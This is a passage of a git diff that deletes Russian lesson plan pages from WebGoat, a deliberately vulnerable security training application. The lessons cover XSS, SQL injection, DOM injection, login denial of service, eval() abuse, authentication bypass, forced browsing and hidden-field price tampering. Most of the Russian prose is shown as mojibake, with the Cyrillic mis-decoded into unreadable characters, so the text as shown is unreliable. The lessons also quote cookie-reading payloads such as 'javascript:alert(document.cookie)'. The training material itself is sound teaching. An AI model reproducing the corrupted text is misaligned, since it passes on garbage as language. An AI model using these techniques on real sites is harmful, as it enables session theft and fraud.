-которой раÑположена форма перевода денег. Ð”Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб увидеть форму, необходимо к текущему URL
-допиÑать параметр "transferFunds=main". Загрузите Ñту Ñтраницу, Ñчитайте оттуда значение токена и оÑущеÑтвите перевод.
-Ð’ конце работы обновите текущую Ñтраницу. ЕÑли задание выполнено верно, то в главном меню, на против Ñтого урока,
-поÑвитÑÑ Ð·ÐµÐ»Ñ‘Ð½Ð°Ñ Ð¾Ñ‚Ð¼ÐµÑ‚ÐºÐ°.
-
-
-
diff --git a/src/main/webapp/lesson_plans/ru/DBCrossSiteScripting.html b/src/main/webapp/lesson_plans/ru/DBCrossSiteScripting.html
deleted file mode 100644
index 913efa53b..000000000
--- a/src/main/webapp/lesson_plans/ru/DBCrossSiteScripting.html
+++ /dev/null
@@ -1,21 +0,0 @@
-
-
Ðазвание урока: Как проводить атаки межÑайтового Ñкриптинга (XSS)
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Хорошей практикой вÑегда ÑчиталаÑÑŒ очиÑтка вÑех входÑщих данных, оÑобенно когда
-их Ñодержимое будут иÑпользовано в качеÑтве команд ОС, Ñкриптов или запроÑов к
-БД. Ðто важно и Ð´Ð»Ñ Ñ‚ÐµÑ… данных, которые будут Ñохранены где-то
-внутри приложениÑ. ПоÑетители не должны иметь возможноÑть публикации на Ñайте
-таких Ñообщений, которые могут изменÑть Ñтруктуру Ñтраницы при их проÑмотре.
-
-XSS также может возникнуть когда Ð²Ð²ÐµÐ´Ñ‘Ð½Ð½Ð°Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»ÐµÐ¼ Ð¸Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ Ñразу же,
-без вÑÑчеÑких проверок, помещаетÑÑ Ð² HTTP-запроÑ, но не ÑохранÑетÑÑ Ð²Ð½ÑƒÑ‚Ñ€Ð¸ приложениÑ
-(отражаемые XSS). Ð’ таких ÑлучаÑÑ… нападающий может Ñформировать URL, Ñодержащий в Ñебе
-вредоноÑный код и передать его жертве(ам) через Ñторонний веб-Ñайт, почту или любым другим ÑпоÑобом.
-
-ОÑновные цели:
-Ð’ данном упражнении вы научитеÑÑŒ оÑущеÑтвлÑть хранимые XSS-атаки.
-Ð’ конце урока вам необходимо будет внеÑти Ð¸Ð·Ð¼ÐµÐ½ÐµÐ½Ð¸Ñ Ð² код базы данных Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾, чтоб предотвратить подобые нападениÑ.
-
-
diff --git a/src/main/webapp/lesson_plans/ru/DBSQLInjection.html b/src/main/webapp/lesson_plans/ru/DBSQLInjection.html
deleted file mode 100644
index 879a1b92e..000000000
--- a/src/main/webapp/lesson_plans/ru/DBSQLInjection.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lesson Plan Title: How to Perform SQL Injection
-
-Concept / Topic To Teach:
-
-It is always a good practice to scrub all inputs, especially those
-inputs that will later be used as parameters to OS commands, scripts,
-and database queries. Users should not be able to alter the intent of
-commands that are executed on the server, in many cases as a privileged user.
-
-General Goal(s):
-For this exercise, you will perform a SQL Injection attack.
-You will also implement code changes in the database to defeat
-these attacks.
-
-
diff --git a/src/main/webapp/lesson_plans/ru/DOMInjection.html b/src/main/webapp/lesson_plans/ru/DOMInjection.html
deleted file mode 100644
index 8b4a87564..000000000
--- a/src/main/webapp/lesson_plans/ru/DOMInjection.html
+++ /dev/null
@@ -1,23 +0,0 @@
-
-
Ðазвание урока: Выполнение атаки клаÑÑа 'DOM-инъекциÑ'.
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-Выполнение атаки клаÑÑа 'DOM-инъекциÑ'.
-
-
-
-Как работают атаки данного вида:
-
-Ðекое приложение иÑпользует технологию AJAX Ð´Ð»Ñ Ð¼Ð°Ð½Ð¸Ð¿ÑƒÐ»Ð¸Ñ€Ð¾Ð²Ð°Ð½Ð¸Ñ DOM Ñтраницы и его обновлениÑ
-по ÑредÑтвам JavaScript, DHTML и функции eval().
-Ð’ данном Ñлучае атакующий может каким-либо образом попытатьÑÑ Ð¿Ñ€ÐµÑ…Ð²Ð°Ñ‚Ð¸Ñ‚ÑŒ ответ Ñервера, и помеÑтить
-в него набор вредоноÑных JavaScript-команд.
-
-ОÑновные цели и задачи:
-
-* Ваша жертва - Ñто ÑиÑтема Ñ‚Ñ€ÐµÐ±ÑƒÑŽÑ‰Ð°Ñ Ð¾Ñ‚ клиентов ключ активации Ð´Ð»Ñ ÐµÑ‘ иÑпользованиÑ.
-* Ваша задача ÑоÑтоит в том, чтоб каким-либо образом разблокировать кнопку активации.
-* Уделите немного времени проÑмотру HTML-кода Ñтраницы и вы поймёте как работает веÑÑŒ механизм активации.
-
-
diff --git a/src/main/webapp/lesson_plans/ru/DOMXSS.html b/src/main/webapp/lesson_plans/ru/DOMXSS.html
deleted file mode 100644
index e17c5d182..000000000
--- a/src/main/webapp/lesson_plans/ru/DOMXSS.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-
Ðазвание урока: МежÑайтовый Ñкриптинг оÑнованный на DOM (DOM XSS)
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-ÐžÐ±ÑŠÐµÐºÑ‚Ð½Ð°Ñ Ð¼Ð¾Ð´ÐµÐ»ÑŒ документа (DOM), Ñ Ñ‚Ð¾Ñ‡ÐºÐ¸ Ð·Ñ€ÐµÐ½Ð¸Ñ Ð±ÐµÐ·Ð¾Ð¿Ð°Ð½Ð¾Ñти, Ñоздаёт Ñобой одну интереÑную проблему.
-Она позволÑет Ñодержимому веб-Ñтраниц динамичеÑки менÑтьÑÑ, что Ñамо по Ñебе ÑвлÑетÑÑ Ñ…Ð¾Ñ€Ð¾ÑˆÐµÐ¹ возможноÑтью
-не только Ð´Ð»Ñ Ð²ÐµÐ±-маÑтеров, но и Ð´Ð»Ñ Ð·Ð»Ð¾ÑƒÐ¼Ñ‹ÑˆÐ»ÐµÐ½Ð½Ð¸ÐºÐ¾Ð². С её помощью нападающие могут помещать в код Ñтраниц
-вредоноÑные вÑтавки (XSS), еÑли в процеÑÑе модификации их Ñодержимого на Ñтороне клиента не проиÑходит
-доÑтаточной проверки данных вводимых пользователем.
-
-
-ОÑновные цели и задачи:
-Ð’ данном упражнении вам необходимо Ñ Ð¸Ñпользованием Ñтой уÑзвимоÑти помеÑтить вредоноÑный код
-в объектную модель документа. Рв Ñамом конце вы иÑправите ошибку приводÑщую к её поÑвлению.
diff --git a/src/main/webapp/lesson_plans/ru/DOS_Login.html b/src/main/webapp/lesson_plans/ru/DOS_Login.html
deleted file mode 100644
index 460cd4100..000000000
--- a/src/main/webapp/lesson_plans/ru/DOS_Login.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Ðазвание урока: Отказ в обÑлуживании при неÑкольких одновременных попытках авторизации
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Ðтаки клаÑÑа "Отказ в обÑлуживании" ÑвлÑÑŽÑ‚ÑÑ Ð³Ð»Ð°Ð²Ð½Ð¾Ð¹ проблемой веб-приложений. Ситуации, при которых конечный пользователь
-долгое Ð²Ñ€ÐµÐ¼Ñ Ð½Ðµ может получить доÑтуп к важному приложению или ÑервиÑу, могут принеÑти большие убытки.
-ОÑновные цели и задачи:
-Данный Ñайт позволÑет неÑкольким пользователÑм авторизироватьÑÑ Ð¾Ð´Ð½Ð¾Ð²Ñ€ÐµÐ¼ÐµÐ½Ð½Ð¾. Ð’ то же времÑ
-веб-приложение может уÑтанавливать Ñ Ð‘Ð” только 2 ÑÐ¾ÐµÐ´Ð¸Ð½ÐµÐ½Ð¸Ñ Ð·Ð° раз. Ð’Ñ‹ должны получить
-ÑпиÑок ÑущеÑтвующих пользователей и попытатьÑÑ Ð¾Ð´Ð½Ð¾Ð²Ñ€ÐµÐ¼ÐµÐ½Ð½Ð¾ произвеÑти вход от 3 логинов.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/DangerousEval.html b/src/main/webapp/lesson_plans/ru/DangerousEval.html
deleted file mode 100644
index b3ee6b20a..000000000
--- a/src/main/webapp/lesson_plans/ru/DangerousEval.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Ðазвание урока: ОпаÑное иÑпользование eval()
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Хорошей практикой ÑвлÑетÑÑ Ð¿Ñ€Ð¾Ð²ÐµÑ€ÐºÐ° на Ñтороне Ñервера вÑех принимаемых данных.
-Ð’ ÑлучаÑÑ… когда непроверенные пользовательÑкие данные напрÑмую отражаютÑÑ Ð² HTTP-ответе имеетÑÑ
-риÑк поÑÐ²Ð»ÐµÐ½Ð¸Ñ XSS-уÑзвимоÑтей. Ð’ текущем приложении не проходÑщие проверку пользовательÑкие данные помещаютÑÑ
-в Ñтроку передаваемую функции eval(). Ð’ подобных ÑитуациÑÑ… (они называютÑÑ Ð¾Ñ‚Ñ€Ð°Ð¶Ñ‘Ð½Ð½Ñ‹Ð¼Ð¸ XSS-уÑзвимоÑÑ‚Ñми)
-злоумышленник может ÑоÑтавить URL Ñодержащий Ñпециальные вредоноÑные вÑтавки, и опубликовать его
-на Ñтороннем веб-Ñайте, отправить по почте или любым другим ÑпоÑобом донеÑти его до жертвы.
-
-ОÑновные цели и задачи:
-Ваша цель - добитьÑÑ Ð²Ñ‹Ð¿Ð¾Ð»Ð½ÐµÐ½Ð¸Ñ Ð¿Ñ€Ð¾Ð¸Ð·Ð²Ð¾Ð»ÑŒÐ½Ð¾Ð³Ð¾ JavaScript-кода в данном приложении иÑпользуÑ
-уже имеющийÑÑ Ð² Ñтранице вызов eval(). Ð”Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб уÑпешно завершить урок вы дложны вызвать выполнение Ñтроки
-'alert(document.cookie)'.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/Encoding.html b/src/main/webapp/lesson_plans/ru/Encoding.html
deleted file mode 100644
index 2d642a45b..000000000
--- a/src/main/webapp/lesson_plans/ru/Encoding.html
+++ /dev/null
@@ -1,10 +0,0 @@
-
-
Ðазвание урока: ИÑпользование оÑновной кодировки
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-По множеÑтву причин Ñодержимое веб-Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¼Ð¾Ð¶ÐµÑ‚ хранитьÑÑ Ð² неÑкольких разных кодировках.
-
-ОÑновные цели и задачи:
-Данный урок предназначаетÑÑ Ð´Ð»Ñ Ñ‚ÐµÑ…, кто знаком Ñ Ð¿Ð¾Ð½Ñтием кодировок и понимает
-чем они отличаютÑÑ Ð´Ñ€ÑƒÐ³ от друга.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/FailOpenAuthentication.html b/src/main/webapp/lesson_plans/ru/FailOpenAuthentication.html
deleted file mode 100644
index ff90da904..000000000
--- a/src/main/webapp/lesson_plans/ru/FailOpenAuthentication.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
Ðазвание урока: ИÑпользование уÑзвимоÑтей ложной аутентификации
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
- Ðа данном уроке вы ознакомитеÑÑŒ Ñ Ð¾Ñновами Ð²Ð¾Ð·Ð½Ð¸ÐºÐ½Ð¾Ð²ÐµÐ½Ð¸Ñ ÑƒÑловий, приводÑщих к
- ложной аутентификации пользователей. Ðапример, Ð»Ð¾Ð¶Ð½Ð°Ñ Ð°ÑƒÑ‚ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ñ Ð¼Ð¾Ð¶ÐµÑ‚ проиÑходить в тех ÑлучаÑÑ…,
- когда Ð²Ð¾Ð·Ð½Ð¸ÐºÐ°ÑŽÑ‰Ð°Ñ Ð² процеÑÑе работы Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¾ÑˆÐ¸Ð±ÐºÐ° (например неперехваченное иÑключение)
- не позволÑет программе точно определить верноÑть вводимых пользователем данных.
-
-ОÑновные цели и задачи:
-Вы должны обойти механизм проверки аутентификации.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/ForcedBrowsing.html b/src/main/webapp/lesson_plans/ru/ForcedBrowsing.html
deleted file mode 100644
index 51d165243..000000000
--- a/src/main/webapp/lesson_plans/ru/ForcedBrowsing.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
Ðазвание урока: Обращение к Ñкрытым реÑурÑам.
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-Как производить обращение к Ñкрытым реÑурÑам
-
-
-
-Как работают такие атаки:
-
-Ðта техника иÑпользуетÑÑ Ñ…Ð°ÐºÐµÑ€Ð°Ð¼Ð¸ Ð´Ð»Ñ Ð¾Ð±Ñ€Ð°Ñ‰ÐµÐ½Ð¸Ñ Ðº тем реÑурÑам, ÑÑылок на которые
-на Ñайте нет, но доÑтуп к которым никак не ограничен.
-Одним из примеров такой техники ÑвлÑетÑÑ Ð·Ð°Ñ‚Ð¸Ñ€Ð°Ð½Ð¸Ðµ чаÑти URL Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб проÑмотреть Ñодержимое
-незащищённой директории.
-
-ОÑновные цели и задачи:
-
-* Вашей целью ÑвлÑетÑÑ ÑƒÐ³Ð°Ð´Ñ‹Ð²Ð°Ð½Ð¸Ðµ URL интерфейÑа конфигурации.
-* СÑылка на него видна только управлÑющему перÑоналу.
-* Приложение не проверÑет наличие ÑоответÑтвующих привилегий при доÑтупе к нему
-
diff --git a/src/main/webapp/lesson_plans/ru/ForgotPassword.html b/src/main/webapp/lesson_plans/ru/ForgotPassword.html
deleted file mode 100644
index 824374b48..000000000
--- a/src/main/webapp/lesson_plans/ru/ForgotPassword.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
Ðазвание урока: Как можно иÑпользовать Ñтраницу воÑÑÑ‚Ð°Ð½Ð¾Ð²Ð»ÐµÐ½Ð¸Ñ Ð¿Ð°Ñ€Ð¾Ð»Ñ
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Веб-Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¾Ñ‡ÐµÐ½ÑŒ чаÑто предоÑтавлÑÑŽÑ‚ Ñвоим пользователÑм возможноÑть воÑÑÑ‚Ð°Ð½Ð¾Ð²Ð»ÐµÐ½Ð¸Ñ Ð·Ð°Ð±Ñ‹Ñ‚Ð¾Ð³Ð¾ паролÑ.
-К Ñожалению, во многих из них данный механизм реализован не безопаÑно. ИнформациÑ, Ñ‚Ñ€ÐµÐ±ÑƒÐµÐ¼Ð°Ñ Ð´Ð»Ñ Ð¸Ð´ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ð¸
-пользователÑ, как правило, очень проÑта.
-ОÑновные цели:
-Пользователи могут воÑÑтановить их пароль еÑли у них получитÑÑ Ð¾Ñ‚Ð²ÐµÑ‚Ð¸Ñ‚ÑŒ на Ñекретный вопроÑ. Ðа Ñтранице
-воÑÑÑ‚Ð°Ð½Ð¾Ð²Ð»ÐµÐ½Ð¸Ñ Ð½ÐµÑ‚ никаких мезанизмов ÑвÑзанных Ñ Ð±Ð»Ð¾ÐºÐ¸Ñ€Ð¾Ð²ÐºÐ¾Ð¹ аккаунтов. Ваше Ð¸Ð¼Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ - 'webgoat',
-любимый цвет - краÑный (red). Цель урока - воÑÑтановить пароль к аккаунту другого пользователÑ.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/HiddenFieldTampering.html b/src/main/webapp/lesson_plans/ru/HiddenFieldTampering.html
deleted file mode 100644
index e30a55e33..000000000
--- a/src/main/webapp/lesson_plans/ru/HiddenFieldTampering.html
+++ /dev/null
@@ -1,17 +0,0 @@
-
-
Ðазвание урока: ИÑпользование Ñкрытых полей форм
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Разработчики иÑпользуют Ñкрытые Ð¿Ð¾Ð»Ñ Ñ„Ð¾Ñ€Ð¼ Ð´Ð»Ñ Ñ…Ñ€Ð°Ð½ÐµÐ½Ð¸Ñ Ð½Ð° загруженной клиентом Ñтранице
-информации о ценах, авторизации, отÑÐ»ÐµÐ¶Ð¸Ð²Ð°Ð½Ð¸Ñ Ð¿ÐµÑ€ÐµÑ…Ð¾Ð´Ð¾Ð² по Ñайту и многом другом.
-Очень чаÑто программиÑты пренебрегают проверкой данных получаемых из них.
-Ðа Ñтом уроке вы научитеÑÑŒ находить hidden-Ð¿Ð¾Ð»Ñ Ð¸ изменÑть их Ñодержимое Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб
-уÑтанавливать товарам нужную вам цену.
-
-
-ОÑновные цели и задачи:
-Пользователь должен Ð¼Ð°Ð½Ð¸Ð¿ÑƒÐ»Ð¸Ñ€ÑƒÑ Ð·Ð½Ð°Ñ‡ÐµÐ½Ð¸Ñми Ñкрытых полей приобреÑти товар по ненаÑтоÑщей цене.
-
-Попробуйте заказать HDTV намного дешевле чем он Ñтоит на Ñамом деле.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/HowToWork.html b/src/main/webapp/lesson_plans/ru/HowToWork.html
deleted file mode 100644
index f9f206c52..000000000
--- a/src/main/webapp/lesson_plans/ru/HowToWork.html
+++ /dev/null
@@ -1,55 +0,0 @@
-
-Как работать Ñ WebGoat
-
-Добро пожаловать в краткую инÑтрукцию по работе Ñ WebGoat.
-ЗдеÑÑŒ вы научитель иÑпользовать Ñам WebGoat, а также инÑтрументы, необходимые Ð´Ð»Ñ Ð½ÐµÐºÐ¾Ñ‚Ð¾Ñ€Ñ‹Ñ… уроков.
-
-Ð˜Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ Ð¾ Ñреде работы WebGoat
-
-WebGoat работает под управлением Apache Tomcat. По умолчанию он наÑтроен на работу на хоÑте localhost,
-однако в Ñлучае необходимоÑти Ð¸Ð¼Ñ Ñ…Ð¾Ñта может быть легко изменено.
-Кроме того, по умолчанию WebGoat наÑтроен на работу лишь Ñ Ð¾Ð´Ð½Ð¸Ð¼ пользователем. Дополнительные учётные запиÑи
-вы можете добавить в файле tomcat-users.xml.
-ЕÑли вы хотите иÑпользовать WebGoat в лаборатории или клаÑÑе вам обÑзательно нужно изменить его базовую конфигурацию.
-Ð”Ð»Ñ Ñтого пройдите в раздел "Введение" и прочтите главу "ÐаÑтройка Tomcat"
-
-
-Ð˜Ð½Ñ‚ÐµÑ€Ñ„ÐµÐ¹Ñ WebGoat
-
-
-1. ЗдеÑÑŒ раÑполагаютÑÑ ÐºÐ°Ñ‚ÐµÐ³Ð¾Ñ€Ð¸Ð¸ уроков WebGoat. Кликните по любой категории и вы увидите какие уроки в неё входÑÑ‚.
-2. При клике здеÑÑŒ находÑÑ‚ÑÑ Ð¿Ð¾Ð´Ñказки которые помогут вам проходить уроки.
-3. При клике здеÑÑŒ отобразÑÑ‚ÑÑ Ð¿Ð°Ñ€Ð°Ð¼ÐµÑ‚Ñ€Ñ‹ текущего HTTP-запроÑа
-4. При клике здеÑÑŒ отобразÑÑ‚ÑÑ Ñ‚ÐµÐºÑƒÑ‰Ð¸Ðµ Cookies
-5. При клике здеÑÑŒ отобразÑÑ‚ÑÑ Ñ†ÐµÐ»Ð¸ и задачи текущего урока.
-6. При клике здеÑÑŒ отобразитÑÑ Ð¸Ñходный код урока на Java.
-7. При клике здеÑÑŒ отобразитÑÑ Ñ€ÐµÑˆÐµÐ½Ð¸Ðµ текущего урока.
-8. Ð’ Ñлучае еÑли вы хотите начать урок заново кликите на Ñту ÑÑылку.
-Решение уроков
-
-Ð’Ñегда начинайте работу по плану текущего урока. ЕÑли вдруг решить урок у Ð²Ð°Ñ Ð½Ð¸ÐºÐ°Ðº не получаетÑÑ,
-воÑпользуйтеÑÑŒ подÑказками к нему. Ð’ том Ñлучае, еÑли урок не получаетÑÑ Ñ€ÐµÑˆÐ¸Ñ‚ÑŒ даже Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ подÑказок
-вы можете поÑмотреть подробное его решение.
-Чтение и редактирование параметров
-
-Ð”Ð»Ñ Ñ‡Ñ‚ÐµÐ½Ð¸Ñ Ð¸ Ñ€ÐµÐ´Ð°ÐºÑ‚Ð¸Ñ€Ð¾Ð²Ð°Ð½Ð¸Ñ Ð¿Ð°Ñ€Ð°Ð¼ÐµÑ‚Ñ€Ð¾Ð² вам необходимо иметь локальный прокÑи-Ñервер ÑпоÑобный перехватывать
-HTTP-запроÑÑ‹. ЗдеÑÑŒ вы можете иÑпользовать WebScarab. Более подробную информацию о нём вы можете получить в разделе
-"ИÑпользуемые инÑтрументы". ПоÑле уÑтановки WebScarab и наÑтройки браузера на работу Ñ Ð½Ð¸Ð¼ можно начинать прохождение уроков.
-
-
-Мы Ñтавим галочку в поле "Intercept Request" на закладке "Intercept". ЕÑли мы ÑÐµÐ¹Ñ‡Ð°Ñ Ð¿Ð¾ÑˆÐ»Ñ‘Ð¼ из браузера какой-либо запроÑ, то Ñразу
-же поÑвитÑÑ Ð½Ð¾Ð²Ð¾Ðµ окно WebScarab.
-
-ЗдеÑÑŒ мы можем Ñмотреть и редактировать перехватываемые параметры. ПоÑле Ð½Ð°Ð¶Ð°Ñ‚Ð¸Ñ "Accept Changes" Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð¿Ð¾Ð¹Ð´Ñ‘Ñ‚ дальше на Ñервер.
-
-ПроÑмотр и редактирование Cookies
-
-Почти вÑегда редактирование Cookies проиÑходит точно также как и редактирование параметров запроÑа.
-Мы можем иÑпользовать WebScarab Ð´Ð»Ñ Ð¿ÐµÑ€ÐµÑ…Ð²Ð°Ñ‚Ð° запроÑа и Ð¸Ð·Ð¼ÐµÐ½ÐµÐ½Ð¸Ñ Ð·Ð½Ð°Ñ‡ÐµÐ½Ð¸Ð¹ имеющихÑÑ Ð² нём Cookies
-точно также как опиÑывалоÑÑŒ выше.
-
-
-При отправке нового запроÑа поÑвитÑÑ ÑƒÐ¶Ðµ знакомое окно. Ðа Ñкриншоте вы видите где может раÑполагатьÑÑ
-Ñтрока Ñ Cookies и как можно редактировать её значение.
-
-
diff --git a/src/main/webapp/lesson_plans/ru/HtmlClues.html b/src/main/webapp/lesson_plans/ru/HtmlClues.html
deleted file mode 100644
index 4272bcabf..000000000
--- a/src/main/webapp/lesson_plans/ru/HtmlClues.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Ðазвание урока: How to Discover Clues in the HTML
-
-
-Concept / Topic To Teach:
-
-Многие разработчики, к Ñожалению, забывают удалÑть из рабочих верÑий кода вÑевозможные отметки типа FIXME, TODO, небольшие хаки и Ñ‚.д.
- ИÑÑледование иÑходного кода на наличие различных комментариев , паролей, бÑкдоров и прочего может очень
-Ñильно вам помочь. Ðиже предÑтавлена форма авторизации. Попробуйте иÑÑледовать код Ñтраницы и найти
-зацепки которые позволÑÑ‚ вам войти как легитимный пользователь.
-
-
-ОÑновные цели и задачи:
-Ð’Ñ‹ должны обойти ÑиÑтему авторизации.
diff --git a/src/main/webapp/lesson_plans/ru/HttpBasics.html b/src/main/webapp/lesson_plans/ru/HttpBasics.html
deleted file mode 100644
index 82fac4497..000000000
--- a/src/main/webapp/lesson_plans/ru/HttpBasics.html
+++ /dev/null
@@ -1,33 +0,0 @@
-
-
Ðазвание урока: ОÑновы Http
-
-
-Тема изучениÑ:
-Ð’ данном уроке предÑтавлены оÑновы необходимые Ð´Ð»Ñ Ð¿Ð¾Ð½Ð¸Ð¼Ð°Ð½Ð¸Ñ Ð¿Ñ€Ð¾Ñ†ÐµÑÑа передачи данных между браузером и веб-приложением.
-
-
-Как работает HTTP:
-
-Ð’Ñе Ð¾Ð±Ñ€Ð°Ñ‰ÐµÐ½Ð¸Ñ Ð¿Ð¾ протоколу HTTP имеют один оÑновной формат. Кажный Ð·Ð°Ð¿Ñ€Ð¾Ñ ÐºÐ»Ð¸ÐµÐ½Ñ‚Ð° или ответ Ñервера ÑоÑтоит из трёх чаÑтей:
-Ñтрока запроÑа или ответа, заголовок и тело. Клиент начинает предачу данных Ñледующим образом:
-
- Он ÑоединÑетÑÑ Ñ Ñервером и отправлÑет Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð´Ð»Ñ Ð¿Ð¾Ð»ÑƒÑ‡ÐµÐ½Ð¸Ñ Ð´Ð¾ÐºÑƒÐ¼ÐµÐ½Ñ‚Ð°
-
-
-GET /index.html?param=value HTTP/1.0
-Далее он шлёт различную информацию в разделе заголовка чтоб уведомить Ñервер о Ñвоей конфигурации и возможноÑÑ‚ÑÑ…
-(например какие кодировки и типы документов поддерживаютÑÑ ÐºÐ»Ð¸ÐµÐ½Ñ‚Ð¾Ð¼).
-
-User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*
-ПоÑле отправки запроÑа и заголовков клиент может отправить дополнительные данные. Они в большинÑтве Ñлучаев
-предназначаютÑÑ Ð´Ð»Ñ CGI-программ иÑпользующих метод POST Ð´Ð»Ñ Ð¿Ñ€Ð¸Ð½ÑÑ‚Ð¸Ñ Ð¸Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ð¸.
-ОÑновные цели и задачи:
-
-Введите ваше Ð¸Ð¼Ñ Ð² поле раÑположенное ниже и нажмите "Вперёд!" Ð´Ð»Ñ Ð¾Ñ‚Ð¿Ñ€Ð°Ð²ÐºÐ¸ формы. Сервер примет ваш запроÑ, выÑтроит
-полученную Ñтроку в обратном порÑдке и выведет результат на Ñкран. Данный пример иллюÑтрирует оÑновы обработки данных
-полученных из HTTP-запроÑа.
-
-Пользователю необходимо ознакомитÑÑ Ñ Ð¸Ñпользованием функций WebGoat, таких как проÑмотр подÑказок, отображение параметров HTTP-запроÑа,
-отображение Cookies и иÑходных кодов Java. Первое времÑ, в качеÑтве практики, Ð´Ð»Ñ Ð¿Ñ€Ð¾Ñмотра параметров и Cookies
-запроÑов вы можете иÑпользовать WebScarab.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/HttpOnly.html b/src/main/webapp/lesson_plans/ru/HttpOnly.html
deleted file mode 100644
index 4478b5718..000000000
--- a/src/main/webapp/lesson_plans/ru/HttpOnly.html
+++ /dev/null
@@ -1,24 +0,0 @@
-
-
Ðазвание урока: Проверка HttpOnly
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Ð”Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб помешать проведению XSS-нападений ÐºÐ¾Ð¼Ð¿Ð°Ð½Ð¸Ñ Microsoft
-ввела новый параметр Ð´Ð»Ñ cookies, называемый 'HttpOnly'. ЕÑли данный флаг
-активен, то браузер не разрешает работающим на Ñтороне клиента Ñкриптам
-получать доÑтуп к cookies. Ðекоторые браузеры, к Ñожалению, не учитывают
-наличие 'HttpOnly' в Ñвоей работе.
-СпиÑок браузеров поддерживающих данный параметр можно найти здеÑÑŒ: OWASP HTTPOnly Support
-
ОÑновные цели и задачи:
-Ðа данном уроке вы должны проверить, поддерживает ли ваш браузер флаг HTTPOnly применив его к
-cookies Ñ Ð¸Ð¼ÐµÐ½ÐµÐ¼ unique2u .
-ЕÑли да, то включив его вы не Ñможете получить доÑтуп к их Ñодержимому через
-код на клиентÑкой Ñтороне. Ð’Ñ‹ также не Ñможете запиÑывать новые данные в них, или изменÑть
-уже имеющиеÑÑ (Ñ…Ð¾Ñ‚Ñ Ð½ÐµÐºÐ¾Ñ‚Ð¾Ñ€Ñ‹Ðµ браузеры запрещают только Ñчитывание).
-Ðо при Ñтом браузер иÑправно будет предавать их Ñерверу.
-
-
-Когда вы включите HTTPOnly, находÑÑÑŒ на Ñтранице, cookies домена которой он защищает,
-впишите в адреÑную Ñтроку выражение "javascript:alert(document.cookie)". Ð’Ñ‹ увидите табличку Ñо вÑеми
-cookies кроме unique2u.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/HttpSplitting.html b/src/main/webapp/lesson_plans/ru/HttpSplitting.html
deleted file mode 100644
index 3047f40e1..000000000
--- a/src/main/webapp/lesson_plans/ru/HttpSplitting.html
+++ /dev/null
@@ -1,47 +0,0 @@
-
-
Ðазвание урока: Проводение атак HTTP Splitting
-
-
-Тема изучениÑ:
-Ðа данном уроке вы ознакомитеÑÑŒ Ñ Ð°Ñ‚Ð°ÐºÐ°Ð¼Ð¸ клаÑÑа HTTP Splitting
-
-
-
-Как работают такие атаки:
-
-
- Ðтакующий поÑылает веб-Ñерверу вредоноÑные данные вмеÑте Ñ Ð¾Ð¶Ð¸Ð´Ð°ÐµÐ¼Ñ‹Ð¼Ð¸. УÑзвимое приложение не проверÑет полученную
